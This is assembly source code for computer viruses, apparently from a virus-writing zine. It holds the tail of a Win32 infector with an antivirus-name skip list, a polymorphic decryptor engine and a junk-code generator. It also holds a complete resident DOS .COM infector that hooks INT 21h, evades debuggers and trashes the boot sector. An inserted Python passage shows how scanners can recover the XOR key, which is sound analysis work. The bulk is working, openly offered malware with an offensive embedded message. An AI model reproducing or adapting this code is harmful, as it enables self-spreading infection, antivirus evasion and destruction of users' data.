db 04ch,0ffh,04bh,0e0h,033h,0f0h,03dh
first4bts dd ? ;the first 4 overwritten bytes from the host
dospayloadsize equ $-offset dospayload

badnames label byte
db 04h,"_AVP" ;_AVP files
db 03h,"NAV" ;Norton AV
db 02h,"TB" ;Tbscan, Tbav32, whole shit
db 02h,"F-" ;F-Prot
db 03h,"PAV" ;Panda AV
db 03h,"DRW" ;Doc. Web
db 04h,"DSAV" ;Doc. Salomon
db 03h,"NOD" ;NodIce
db 03h,"SCA" ;SCAN
db 05h,"NUKEN" ;Nukenabber? (error with infecting)
db 04h,"YAPS" ;YetAnotherPortScanner (selfcheck)
db 03h,"HL." ;HalfLife (thx to Ghostie!)
db 04h,"MIRC" ;mIRC = strange
db 0h

;--------------------------------------------------------------------------
; * Checks the name of the file to be infected
;--------------------------------------------------------------------------

checkname: ;check for some bad names
pushad

mov ebp,edi ;delta


mov edi,esi ;points to filename

mov al,'.'
cld
scasb ;search from left to right for the dot
jne $-1
std
mov al,'\' ;search from right to left for the \
scasb
jne $-1

inc edi ;edi pointed to char before \
inc edi ;edi pointed to \

cld

lea esi,[offset badnames+ebp-start]

checkname2:
xor eax,eax ;for load AL
lodsb ;size of string in al
or al,al
jz didit
mov ecx,eax ;counter for bytes
push edi ;save pointer to filename
rep cmpsb ;compare stringbyte
pop edi
jz ArghItIsAshitFile
add esi,ecx
jmp checkname2

ArghItIsAshitFile:
popad
stc
ret
didit:
popad
clc
ret
;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; *** POLYMORPHIC engine which generates the decryptor & encrypts the code ***
;--------------------------------------------------------------------------

;
; The generated code will look like this:
;
; pushad
; lea RegUsedAsPointer,[eax+placewherecryptedcodestarts]
; mov keyregister,randomvalue
; sub keyregister,randomvalue
; mov counterreg,size
; again:
; mov tempregister,[RegUsedAsPointer]
; xor tempregister,keyregister
; mov [RegUsedAsPointer],tempregister
; add RegUsedAsPointer,4
; dec counterreg
; pushf
; popf
; jz exit
; jmp again
; exit:
;
;
; between each instruction some random do-nothing code is put.
polysz equ offset polyend - offset encrypt
encrypt:
push eax
push ebx
push edx
push esi
push edi

lea edi,[offset viruscopy+ebp-start] ;edi points to buffer

call gengarbage

;--------PUSHAD--
mov al,60h ;pushad
stosb
;--------MOV-----

call gengarbage

getregforoffset: ;This reg will contain the offset of code
call getrndal
cmp al,4 ;do not use ESP
je getregforoffset
cmp al,5 ;do not use EBP (!)
je getregforoffset

mov ch,al ;backup register for offset code

;--LEA reg,[EAX+x]- ;lea
shl al,3
mov ah,08dh
xchg ah,al
add ah,080h
push edi ;save location for patch
stosw
stosd ;doesn't matter what we store
;------------------

call gengarbage

getregforkey: ;This reg will contain the crypt key
call getrndal
cmp al,4 ;do not use ESP
je getregforkey
cmp al,1 ;do not use ECX
je getregforkey
cmp al,ch
je getregforkey

mov cl,al ;backup register

call gengarbage

;--------MOV-----
add al,0b8h ;make a MOV reg, rndvalue
stosb
call get_rnd32
stosd
;----------------

mov ebx,eax ;backup key
mov ah,cl ;register back in ah

call gengarbage

;--------SUB-----
mov al,081h ;make a SUB reg, rndvalue
add ah,0e8h
stosw
call get_rnd32
stosd
;----------------

sub ebx,eax ;Save the cryptkey

getregforsize:
call getrndal
cmp al,4 ;do not use ESP
je getregforsize
cmp al,cl ;nor keyreg
je getregforsize
cmp al,ch ;nor offsetreg
je getregforsize

mov dh,al

call gengarbage

;----MOVSIZE----- ;mov ecx,virussize (size to decrypt)
add al,0b8h
stosb
mov eax,virusz/4
stosd
;----------------

;*** AT THIS POINT EDI IS THE OFFSET FOR THE JMP ***

mov esi,edi

;8b + 00, eax=3,[eax=0] ch = reg2

getregtoxor: ;This reg will contain crypted code and'll be xored
call getrndal
cmp al,4 ;do not use ESP
je getregtoxor
cmp al,cl
je getregtoxor ;do not use the keyreg
cmp al,ch
je getregtoxor ;do not use the offset reg
cmp al,dh
je getregtoxor

mov dl,al
call gengarbage

;-MOV REG3,[REG2] ;make a mov reg3,[reg2] reg2=offset code
shl al,3
or al,ch
mov ah,08bh
xchg al,ah
stosw
;----------------

call gengarbage

;-XOR REG3,REG1-- ;make a xor reg3,reg1 reg1=key
mov al,dl
shl al,3
or al,cl
add al,0c0h
mov ah,33h
xchg al,ah
stosw
;----------------

call gengarbage

mov al,dl

;-MOV [REG2],REG3 ;make a mov [reg2],reg3 reg2=offset code
shl al,3
or al,ch
mov ah,089h
xchg al,ah
stosw
;----------------

call gengarbage

;-ADD REG2,4----- ;adds 4 to the offset register
mov al,83h
stosb
mov ax,004c0h
add al,ch
stosw
;----------------

call gengarbage

;---DEC REG4----- ;decreases counter reg4 (size)
mov al,dh
add al,048h
stosb
;----------------

mov eax,9c66h ;pushf
stosw

call gengarbage

inc ah ;popf
stosw

;---JZ OVER------
mov ax,074h
stosw
push edi
;----------------

mov eax,edi ;can't generate > 80h-5 bytes of garbage
regenerate: ;between JZ beh - poly - JMP - beh: code...
mov edi,eax ;restore EDI for ja

call gengarbage

mov edx,edi
sub edx,eax
cmp edx,080h-5 ;80h = max JZ distance, 5 is size of JMP BACK
ja regenerate

;----JMP BACK----
sub esi,edi
mov al,0e9h
stosb
mov eax,0fffffffbh
add eax,esi
stosd
;----------------

;----PATCH JZ----
pop esi ;esi-1 = jz value

mov eax,edi
sub eax,esi
mov byte ptr [esi-1],al

;----------------

call gengarbage

;----POPAD-------
mov al,61h ;popad
stosb
;----------------

call gengarbage

;----PATCH LEA---
pop esi ;patch LEA reg1,[EAX+startofcrypted]
push edi
sub edi,offset viruscopy-start
sub edi,ebp
mov dword ptr [esi+2],edi
pop edi
;----------------

mov ecx,virusz/4 ;copy encrypted virus code after poly
mov esi,ebp ;decryptors
cryptit:
lodsd
xor eax,ebx
stosd
loop cryptit

sub edi,offset viruscopy-start
sub edi,ebp
mov ecx,edi ;virus size + poly in ECX

pop edi
pop esi
pop edx
pop ebx
pop eax
ret
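The comment block at the top of this section describes the shape of the generated decryptor. For an analyst, two facts matter more than the shape: the key is only ever produced by a `mov keyreg, a` followed by `sub keyreg, b` (so key = a - b mod 2^32), and the `cryptit` loop encrypts the body with that single 32-bit key one dword at a time. The Python below is an added example, not code from the zine or from the engine: instead of decoding the stub and the junk between its instructions, it recovers the key and the body's position from eight bytes of known plaintext, which is how a scanner can unpack this scheme without an emulator. The body, the stand-in prefix bytes and the key are all constructed.

```python
"""Known-plaintext key recovery for the XOR-dword body produced by the engine above.
Added example: not code from the zine or from the engine. The sample body, the
decryptor stand-in and the key are constructed."""
import struct

MASK32 = 0xFFFFFFFF


def key_from_mov_sub(mov_imm: int, sub_imm: int) -> int:
    """The decryptor never stores the key directly: it emits 'mov keyreg, a' and then
    'sub keyreg, b', so the key is (a - b) mod 2^32. Handy once both immediates have
    been read off a stub by hand."""
    return (mov_imm - sub_imm) & MASK32


def xor_dwords(buf: bytes, key: int) -> bytes:
    """Mirror of the cryptit loop: XOR every little-endian dword with one 32-bit key.
    XOR is its own inverse, so the same call encrypts and decrypts."""
    if len(buf) % 4:
        raise ValueError("body length must be a multiple of 4")
    return b"".join(struct.pack("<I", d ^ key) for (d,) in struct.iter_unpack("<I", buf))


def find_body(image: bytes, known_prefix: bytes):
    """Locate the encrypted body without parsing the decryptor or its junk.
    At every byte offset derive a candidate key from the first known dword and accept
    the offset where the second dword decrypts to the next known dword.
    Returns (offset, key) or None."""
    if len(known_prefix) < 8:
        raise ValueError("need at least 8 known plaintext bytes")
    k0, k1 = struct.unpack_from("<II", known_prefix)
    for off in range(len(image) - 7):
        c0, c1 = struct.unpack_from("<II", image, off)
        key = c0 ^ k0
        if c1 ^ key == k1:
            return off, key
    return None


def recover_body(image: bytes, known_prefix: bytes, body_len: int):
    """Locate and decrypt body_len bytes of the body; returns the plaintext or None."""
    hit = find_body(image, known_prefix)
    if hit is None:
        return None
    off, key = hit
    return xor_dwords(image[off:off + body_len], key)


# Constructed sample: 15 bytes standing in for the decryptor plus junk (deliberately not
# dword aligned), followed by a 40-byte body encrypted with KEY the way cryptit does it.
KEY = 0xDEADBEEF
BODY = bytes(range(1, 41))
PREFIX = b"\x60\x8D\xB0\x1F\x00\x00\x00\xBB\x78\x56\x34\x12\x81\xEB\x11"
IMAGE = PREFIX + xor_dwords(BODY, KEY)
```

Eight known bytes are enough because a wrong offset passes the second-dword test only with probability 2^-32; with more known plaintext the check can be extended to a third dword, but the scan is already robust on realistic images. The same idea works for any scheme that applies one constant key to fixed-size words, which is why engines of this generation were tractable for scanners.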

;----------------------------------------------------------------------------;
; Generates lots of random instructions that look real but have no net effect
; (each one is undone later, directly or by a push/pop pair)
;----------------------------------------------------------------------------;

gengarbage:
push eax
push ebx
push ecx
push edx
push esi

garbageloop:

call get_rnd32

and al,1111b

cmp al,1
je genadd ;OK

cmp al,2
je gensub ;OK

cmp al,3
je genxor ;OK

cmp al,4
je genmov ;OK

cmp al,5
je genpush ;OK

cmp al,6
je geninc ;OK
cmp al,7
je gendec ;OK

cmp al,8
je gencmp ;OK

cmp al,9
je genjunk ;OK

cmp al,0eh
jb garbageloop

exitgen:

pop esi
pop edx
pop ecx
pop ebx
pop eax

ret

;-----------------------------------------------------------------------------
; Generates random add
;-----------------------------------------------------------------------------
genadd:
call getrndal

cmp al,4
je genadd ;4 = esp, leave him alone

cmp ah,80h
jb addandsub ;generate an add - code - sub

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
ja savetoadd ;yep

call pushregister

call gengarbage

call randomadd ;adds a value or register

call gengarbage

call popregister

jmp exitgen

savetoadd:
call randomadd

jmp exitgen

addandsub:
push eax

xchg al,ah
mov al,081h
add ah,0c0h
stosw
push eax

call get_rnd32
stosd
push eax

call gengarbage

pop ebx
pop eax

add ah,028h
stosw
mov eax,ebx
stosd

pop eax
jmp exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random sub
;-----------------------------------------------------------------------------
gensub:
call getrndal

cmp al,4
je gensub ;4 = esp, leave him alone

cmp ah,80h
jb subandadd ;generate an add - code - sub

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
ja savetosub ;yep

call pushregister

call gengarbage

call randomsub ;adds a value or register

call gengarbage

call popregister

jmp exitgen

savetosub:

call randomsub

jmp exitgen

subandadd:

push eax

xchg al,ah
mov al,081h
add ah,0e8h
stosw
push eax

call get_rnd32
stosd
push eax

call gengarbage

pop ebx
pop eax

sub ah,028h
stosw
mov eax,ebx
stosd

pop eax

jmp exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random xor
;-----------------------------------------------------------------------------
genxor:
call getrndal

cmp al,4
je genxor

cmp ah,80h
jb genxorxor ;generate an xor - code - xor

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
ja savetoxor ;yep

call pushregister ;first push

call gengarbage ;generate some garbage

call randomxor ;xors with a value or register

call gengarbage ;generate some garbage

call popregister ;and pop it

jmp exitgen

savetoxor:

call randomxor

jmp exitgen

genxorxor:
push eax

xchg al,ah
add ah,0f0h
mov al,081h

stosw
push eax

call get_rnd32
stosd
push eax

call gengarbage

pop ebx
pop eax

stosw

mov eax,ebx

stosd

pop eax
jmp exitgen

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random mov
;-----------------------------------------------------------------------------
genmov:
call getrndal

cmp al,4
je genmov

and eax,111b ; eax <- al

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
ja savetomov ;yep

call pushregister ;first push

call gengarbage ;generate some garbage

call randommov ;movs a value or register

call gengarbage ;generate some garbage

call popregister ;and pop it

jmp exitgen

savetomov:

call randommov

jmp exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random push
;-----------------------------------------------------------------------------
genpush:
call getrndal
cmp al,4
je genpush

and eax,111b

call pushregister

call gengarbage

call popregister

jmp exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random inc
;-----------------------------------------------------------------------------
geninc: ;40
call getrndal
cmp al,4
je geninc

cmp ah,80h
ja genincdec

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
ja savetoinc

call pushregister

call gengarbage

add al,040h
stosb

call gengarbage

sub al,040h

call popregister

jmp exitgen

savetoinc:
add al,040h
stosb
jmp exitgen

genincdec:
add al,40h ;inc
stosb

call gengarbage

add al,8 ;dec
stosb

jmp exitgen

;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random dec
;-----------------------------------------------------------------------------
gendec: ;48
call getrndal
cmp al,4
je gendec

cmp ah,80h
ja gendecinc

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?
ja savetodec

call pushregister

call gengarbage

add al,048h
stosb

call gengarbage

sub al,048h

call popregister

jmp exitgen

savetodec:
add al,048h
stosb
jmp exitgen

gendecinc:
add al,48h
stosb

call gengarbage

sub al,8h
stosb
jmp exitgen

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Pushes register in al
;-----------------------------------------------------------------------------
pushregister:
push eax

inc byte ptr [ebp+offset pushtable+eax-start] ;set flag for reg.

add al,050h
stosb

pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Pops register in al
;-----------------------------------------------------------------------------
popregister:
push eax

dec byte ptr [ebp+offset pushtable+eax-start] ;unflag for reg.

add al,058h
stosb

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random add reg, value or add reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomadd:
push eax

call get_rnd32

cmp al,80h
pop eax
push eax
ja addregreg

call randomaddvalue

rndaddb:
pop eax
ret

addregreg:
call randomaddreg
jmp rndaddb

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random add reg,value - reg = al
;-----------------------------------------------------------------------------

; 81 c0+reg value
; reg = eax 05 value

randomaddvalue:
push eax

or al,al ;reg = eax?
jz addeax ;special

xchg al,ah
mov al,081h
add ah,0c0h

stosw

backfromaddeax:
call get_rnd32

stosd

pop eax
ret

addeax:

mov al,05h
stosb
jmp backfromaddeax

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random add reg1,reg2 - reg1 = al
;-----------------------------------------------------------------------------
randomaddreg:
push eax

mov bl,al

call getrndal

shl bl,3

or al,bl ;mix instructions

add al,0c0h
mov ah,03h
xchg ah,al

stosw

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random sub reg, value or sub reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomsub:

push eax

call get_rnd32

cmp al,80h
pop eax
push eax
ja subregreg

call randomsubvalue

rndsubb:
pop eax
ret

subregreg:
call randomsubreg
jmp rndsubb

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random sub reg,value - reg = al
;-----------------------------------------------------------------------------

; 81 c0+reg value
; reg = eax 05 value

randomsubvalue:
push eax

or al,al ;reg = eax?
jz subeax ;special

xchg al,ah
mov al,081h
add ah,0e8h

stosw

backfromsubeax:

call get_rnd32

stosd

pop eax
ret

subeax:

mov al,05h
stosb
jmp backfromsubeax

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random sub reg1,reg2 - reg1 = al
;-----------------------------------------------------------------------------
randomsubreg:
push eax

mov bl,al

call getrndal

shl bl,3

or al,bl ;mix instructions

add al,0c0h
mov ah,03h
xchg ah,al

stosw

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates a xor reg, value or xor reg, reg2 - reg = al
;-----------------------------------------------------------------------------
randomxor:

push eax
call get_rnd32
cmp al,80h
pop eax
push eax
ja xorvalue

call randomxorreg

rndxorr:

pop eax
ret

xorvalue:

call randomxorvalue
jmp rndxorr
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates a random xor reg,reg2 - reg = al
;-----------------------------------------------------------------------------
randomxorreg:
push eax ;6633

mov bl,al

call getrndal

shl bl,3

or al,bl ;mix instructions

add al,0c0h
mov ah,033h

xchg ah,al

stosw

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates a random xor reg,value
;-----------------------------------------------------------------------------
randomxorvalue:
push eax

add al,0f0h
mov ah,081h

xchg al,ah

stosw

call get_rnd32

stosd

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; generates a random mov reg,value or reg,reg2
;-----------------------------------------------------------------------------
randommov:
push eax

cmp ah,080h
jb movreg

call randommovvalue

movback:

pop eax
ret

movreg:
call randommovreg
jmp movback
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates a random mov reg,value
;-----------------------------------------------------------------------------
randommovvalue:
push eax

add al,0b8h

stosb

call get_rnd32

stosd

pop eax
ret

;-----------------------------------------------------------------------------
; generates a random mov reg,reg2
;-----------------------------------------------------------------------------
randommovreg: ;8b (c0+reg) or reg2
push eax
mov bl,al

call getrndal

shl bl,3
or al,bl ;mix instructions

xchg ah,al

mov al,08bh
add ah,0c0h

stosw

pop eax
ret

;-----------------------------------------------------------------------------
; generates a random cmp reg,reg2 or cmp reg,value
;-----------------------------------------------------------------------------
gencmp: ;39/3b
call get_rnd32

cmp ah,0c0h
jb gencmp

cmp al,80h
ja gencmpvalue

push eax

call get_rnd32
mov bh,039h
cmp al,80h
ja gencmp1
add bh,2
gencmp1:

pop eax

mov al,bh

cld
stosw
jmp exitgen

gencmpvalue: ;81f8

and eax,0111b
add ax,081f8h

xchg al,ah

stosw

call get_rnd32

stosd
jmp exitgen

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generate junk f8 - fd
;-----------------------------------------------------------------------------
genjunk:
call get_rnd32
cmp al,0f8h
jb genjunk
cmp al,0fdh
ja genjunk

stosb

jmp exitgen
;-----------------------------------------------------------------------------

getrndal:
call get_rnd32
and al,111b
ret

rdtcs equ <dw 310Fh>

get_rnd32: ;main part by GriYo / 29A
push ecx
push ebx
push edx
push edi
push esi

mov eax,dword ptr [ebp+rnd32_seed-start]
mov ecx,eax
imul eax,41C64E6Dh
add eax,00003039h
mov dword ptr [ebp+rnd32_seed-start],eax

xchg eax,ecx
rdtcs ;just 4 some xtra randomness
xchg eax,ecx
xor eax,ecx

pop esi
pop edi
pop edx
pop ebx
pop ecx
ret

polyend:

db "(c)" ;just some junk

end:

;----------------------------------------------------------------------------;

pointertope dd ?

if debug eq 1
death dd ? ;kill ourself flag
endif
busy dd ?
filename db 100h dup (0h)
peheader db 1024 dup (0h)
whereappend dd ?
pushtable db 8 dup (0h)

viruscopy db (virusz+1000) dup (0h) ;virussize + poly

memend:

_CODE ends

;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
_DATA segment dword use32 public 'DATA'
fill db ?
_DATA ends
_burp segment dword use32 public 'LiFEwiRE'
fill2 db ?
_burp ends
;----------------------------------------------------------------------------;

end start
end
; Resident .COM midfile infector - 666 bytes - 02/2000 by T-2000/IR.
; Uses the INT 21h ISR to locate a suitable place to put the CALL_Virus.

.286
.MODEL TINY
.CODE

Virus_Size EQU (End_Body-START)
Virus_Size_Mem EQU (((End_Heap-START)+15)/16)

START:
PUSHF ; Save registers.
PUSHA
PUSH DS
PUSH ES

CALL Get_IP

; Encrypted with XOR 66h:
; "If Jesus was fucked to death, all xtians would be wearing tiny dildo's"
; (pardon my sense of humour :)

Message DB 6Bh, 6Ch, 2Fh, 00h, 46h, 2Ch, 03h
DB 15h, 13h, 15h, 46h, 11h, 07h, 15h
DB 46h, 00h, 13h, 05h, 0Dh, 03h, 02h
DB 46h, 12h, 09h, 46h, 02h, 03h, 07h
DB 12h, 0Eh, 4Ah, 46h, 07h, 0Ah, 0Ah
DB 46h, 1Eh, 12h, 0Fh, 07h, 08h, 15h
DB 46h, 11h, 09h, 13h, 0Ah, 02h, 46h
DB 04h, 03h, 46h, 11h, 03h, 07h, 14h
DB 0Fh, 08h, 01h, 46h, 12h, 0Fh, 08h
DB 1Fh, 46h, 02h, 0Fh, 0Ah, 02h, 09h
DB 41h, 15h, 6Bh, 6Ch, 61h, 66h

Get_IP: POP SI ; Calculate delta offset.
SUB SI, (Message-START)

MOV AH, 30h ; Get DOS version.
INT 21h

CMP AL, 4 ; We need DOS 4.xx or above.
JB Restore_Host

MOV AX, 2000h ; Virus residency check.
INT 21h

XCHG CX, AX ; Already up there?
JCXZ Restore_Host ; Then abort further install.

MOV AH, 43h ; Soft-Ice residency check.
INT 68h

CMP AX, 0F386h ; Active?
JZ Trash_Boot

; (This works in Win32 as well tho you have to encapsulate it
; with a SEH as the INT 68h will GPF if Soft-Ice ain't loaded).

Alloc_Memory: XOR CX, CX

Alloc_Block: MOV AH, 48h ; Attempt to allocate memory.
MOV BX, Virus_Size_Mem
INT 21h
JNC Init_Block

DEC CX ; CX = -1
JNP Restore_Host ; Endless loop?

MOV AH, 4Ah ; Get blocksize of ES.
MOV BX, CX
INT 21h

MOV AH, 4Ah ; Create room for the virus.
SUB BX, Virus_Size_Mem+1
INT 21h
JNC Alloc_Block

JMP Restore_Host ; And attempt allocation.

Init_Block: MOV ES, AX ; ES = allocated block.

DEC AX ; DS = MCB allocated block.
MOV DS, AX

XOR DI, DI

MOV WORD PTR DS:[DI+1], 8 ; Disguise block as system.

MOV CX, (Virus_Size/2) ; Copy viruscode up there.
SEGCS
REP MOVSW

PUSH ES

MOV AX, 3521h ; Get INT 21h.
INT 21h

PUSH ES
POP DS

MOV AX, 2566h ; Revector it to INT 66h.
MOV DX, BX
INT 21h

POP DS

MOV Busy_Switch, CL ; Clear busy flag.

MOV AL, 21h ; Hook INT 21h.
MOV DX, OFFSET New_Int21h
INT 21h

Restore_Host: PUSH SS ; So we can STOS to SS.
POP ES

MOV BP, SP ; Setup stack pointer.

MOV DI, [BP+(11*2)] ; CALL_Virus return address.

SUB DI, 3 ; Offset of CALL_Virus.

MOV [BP+(11*2)], DI ; Re-execute it later.

MOV AL, NOT 0C3h ; Encrypted original byte.
Host_Byte = BYTE PTR $-1
NOT AL ; Decrypt byte.
STOSB ; Restore byte in memory.

MOV AX, 9090h-1 ; Encrypted original word.
Host_Word = WORD PTR $-2
INC AX ; Decrypt word.
STOSW ; Restore word in memory.

POP ES ; Restore original registers.
POP DS
POPA
POPF

RETN ; And re-execute, fixed code.

Trash_Boot:
MOV AL, 2 ; Trash the bootsector of C:.
MOV CX, 1
XOR DX, DX
SEGCS ; Stupid anti-TBClean trick.
INT 26h

INT 19h ; Reboot the system.

New_Int21h:
CMP AX, 2000h ; Virus residency call.
JNE Check_Exit

CBW ; AX = 0.

IRET ; And return.

Check_Exit: PUSHA ; Save all regs.
PUSH DS
PUSH ES

OR AH, AH ; Program terminate?
JZ Check_Timer

CMP AH, 4Ch ; Program terminate?
JNE Check_Debugger

Check_Timer: IN AX, 40h ; Get a random value.

ADD AL, AH ; 1/256 chance of displaying
JNZ Check_Debugger ; text message.

MOV AH, 0Eh
MOV SI, OFFSET Message

Display_Char: SEGCS ; Fetch next encrypted byte.
LODSB

XOR AL, 66h ; Displayed all so far?
JZ Check_Debugger ; Then bail.

INT 10h ; BIOS display character.

JMP Display_Char ; Go on.

Check_Debugger: XOR DI, DI
MOV DS, DI ; Get 1st instruction of
LDS SI, DS:[DI+(01h*4)] ; INT 01h.
LODSB

MOV AH, AL ; Save it in AH.

MOV DS, DI ; Get 1st instruction of
LDS SI, DS:[DI+(03h*4)] ; INT 03h.
LODSB

XOR AX, 0CFCFh ; if they're not IRET then
JNZ Trash_Boot ; a debugger has hooked them.

Check_Caller: INT 01h ; Annoying break.

JMP $ ; Bail if we're busy already.
Busy_Switch = BYTE PTR $-1

INC CS:Int_Count ; Only examine INTs randomly
JS Exit_ISR ; to prevent slowdowns.
JP Exit_ISR

MOV BP, SP
MOV DS, [BP+(11*2)] ; DS = CS of calling INT 21h.

XCHG SI, AX ; SI = 0.

CMP DS:[SI], 20CDh ; Verify it's a .COM-PSP.
JNE Exit_ISR

; Set the busy flag so we don't get interrupted.

MOV CS:Busy_Switch, (Exit_ISR-Busy_Switch)-1

MOV AH, 62h ; Get current PSP.
INT 66h

CMP BX, [BP+(11*2)] ; Caller's CS == PSP ?
JNE Clear_Busy ; Else it ain't no .COM.

IN AX, 40h ; Get a random number.
ADD AL, AH

CMP AL, 150 ; Infect the program here?
JNB Clear_Busy ; Nope, maybe next time.

MOV DS, DS:[SI+2Ch] ; .COM's environment block.

Scan_For_Name: LODSW ; Scan for the end of all
DEC SI ; settings, after which
; the full path to the
OR AX, AX ; currently executing program
JNZ Scan_For_Name ; resides.

CALL Infect_File

Clear_Busy: AND CS:Busy_Switch, 0 ; Open for business again..

Exit_ISR: POP ES ; Restore the regs.
POP DS
POPA

Do_Old_Int21h: INT 66h ; Call the original INT 21h.
RETF 2 ; And return with new flags.

Seek_EOF:
MOV AX, 4202h ; Seek to the end of file.
XOR CX, CX
CWD
INT 66h

DB 0CDh, 03h ; Annoying break.

Do_RETN: RETN

Infect_File:
MOV AX, 4300h ; Get file's attributes.
LEA DX, [SI+3]
INT 66h
JC Do_RETN

IN AL, 21h ; Lock the keyboard.
OR AL, 00000010b
OUT 21h, AL

INT 01h ; Hang the possible debugger.

PUSH DS ; Save path and attributes.
PUSH DX
PUSH CX

AND CL, 00000110b ; Leave system & hidden files


JZ Clear_Readonly ; alone (and clear r/o bit).

JMP_Nop_Attr: JMP Nop_Attr_Rest ; Fix stack but don't restore


; attributes.

Clear_Readonly: MOV AX, 4301h ; Clear possible r/o bit.


INT 66h
JC JMP_Nop_Attr

MOV AX, 3D02h ; Open file for read/write.


INT 66h
JNC Save_Handle

JMP Restore_Attr

Save_Handle: XCHG BX, AX ; Save filehandle in BX.

PUSH CS
POP DS

MOV SI, OFFSET Header

MOV AH, 3Fh ; Read first 4 bytes of .COM.


MOV CL, 4
MOV DX, SI
INT 66h
JNC Verify_Read

JMP_Close_File: JMP Close_File

Verify_Read: CMP AX, CX ; All 4 bytes were read?
JNE JMP_Close_File

CALL Seek_EOF ; Get filesize.

DEC DX ; .COM is over 64k ?


JNS JMP_Close_File ; Then bail, obviously.

CMP AX, (63*1024) ; .COM is too big?


JA JMP_Close_File

CMP AX, (4*1024) ; Or too small?


JB JMP_Close_File

INC WORD PTR [SI+2] ; Don't infect .SYS-files.


JZ JMP_Close_File

CMP [SI], 'ZM'+1 ; Ditto for .EXE-files.


JE JMP_Close_File

CMP [SI], 'MZ'+1


JE JMP_Close_File

MOV AX, 4202h ; Seek to the last 7 bytes


DEC CX ; of the .COM-file, this
MOV DL, -7 ; is where the possible
INT 66h ; ENUNS-string is located.

; My Win98 .COM-files have the ENUNS changed to NLDNS, so just
; checking for ENUNS would not work with these. Just treat every
; .COM-file as an ENUNS protected file and you're all set.

MOV AH, 3Fh


MOV CX, 7
MOV DX, OFFSET Checksum_ID
INT 66h

; Adjust the file's checksum.

ADD Checksum_Word, Virus_Size

CALL Seek_EOF

LES DI, [BP+(2*10)] ; ES:DI = CS:IP of the next


; instruction in the target.

MOV DX, DI
DEC DH ; Minus PSP (100h).

CMP DX, AX ; IP points into the image?


JNB JMP_Close_File ; Else bail out.

SUB AX, DX ; Calculate displacement.


SUB AX, 3

MOV BP, OFFSET CALL_Virus

MOV CS:[BP+1], AX ; CALL_Virus displacement.

PUSH DX

MOV AX, 4200h ; Seek to the insert offset.


XOR CX, CX
INT 66h
MOV SI, OFFSET Header

MOV AH, 3Fh ; Read the original bytes.


MOV CL, 3
MOV DX, SI
INT 66h

POP DX

CMPSB ; Code in memory is the same


JNE Close_File ; as on disk?

CMPSW ; This avoids infecting


JNE Close_File ; packed files, etc.

SUB SI, 3

LODSB ; Get 1st byte, encrypt and


NOT AL ; save it.
MOV Host_Byte, AL

LODSW ; Do the same with the next


DEC AX ; word.
MOV Host_Word, AX

MOV AX, 4200h ; Seek to the insert offset


XOR CX, CX ; again.
INT 66h

MOV AX, 5700h ; Get file's date & time.


INT 66h
JC Close_File

MOV AL, CL ; Mask-out seconds.


AND AL, 00011111b

CMP AL, (6/2) ; 6 seconds (infected) ?


JE Close_File ; Then abort.

XCHG CX, AX ; Put CX in AX.

AND AL, 11100000b ; Clear seconds field.


OR AL, (6/2) ; Set 6 seconds.

PUSH AX ; Save the file date & time


PUSH DX ; on the stack for later.

MOV AH, 40h ; Write the CALL_Virus into


MOV CX, 3 ; the file.
MOV DX, BP
INT 66h
JC Restore_Date

CALL Seek_EOF

MOV AH, 40h ; Append virusbody to the


MOV CX, Virus_Size ; target file. (DX=0).
INT 66h

Restore_Date: MOV AX, 5701h ; Restore file date & time.


POP DX
POP CX
INT 66h

Close_File: MOV AH, 3Eh ; Close the file.


INT 66h

Restore_Attr: MOV AX, 4301h ; Restore file's attributes.


CMP AX, 0
ORG $-2
Nop_Attr_Rest: MOV AH, 19h ; Nop (get current drive).
POP CX
POP DX
POP DS
INT 66h

Exit_Infect: CMP AX, 545Bh ; Executable text string,


XOR CH, [BX] ; '=[T2/IR]='. Very effective
DEC CX ; against lame text patching.
PUSH DX
POP BP
CMP AX, 0DEADh

IN AL, 21h ; Reverse state of keyboard,


XOR AL, 00000010b ; it'll lock if a debugger
OUT 21h, AL ; has skipped the 1st lock.

INT 03h ; Hang the possible debugger.

RETN

CALL_Virus DB 0E8h ; CALL opcode.


DW 0

Checksum_ID DB 5 DUP(0) ; Usually 'ENUNS'.


Checksum_Word DW 666 ; Checksum itself.

End_Body:

Int_Count DB 0
Header DB 4 DUP(0)

End_Heap: ; So it's lame.. a lame virus for a lame person..


; Haven't bothered optimizing the code structure to
; the max, no time nor desire, sorry.. Remember, this
; is just a demonstration virus....

; Amen.

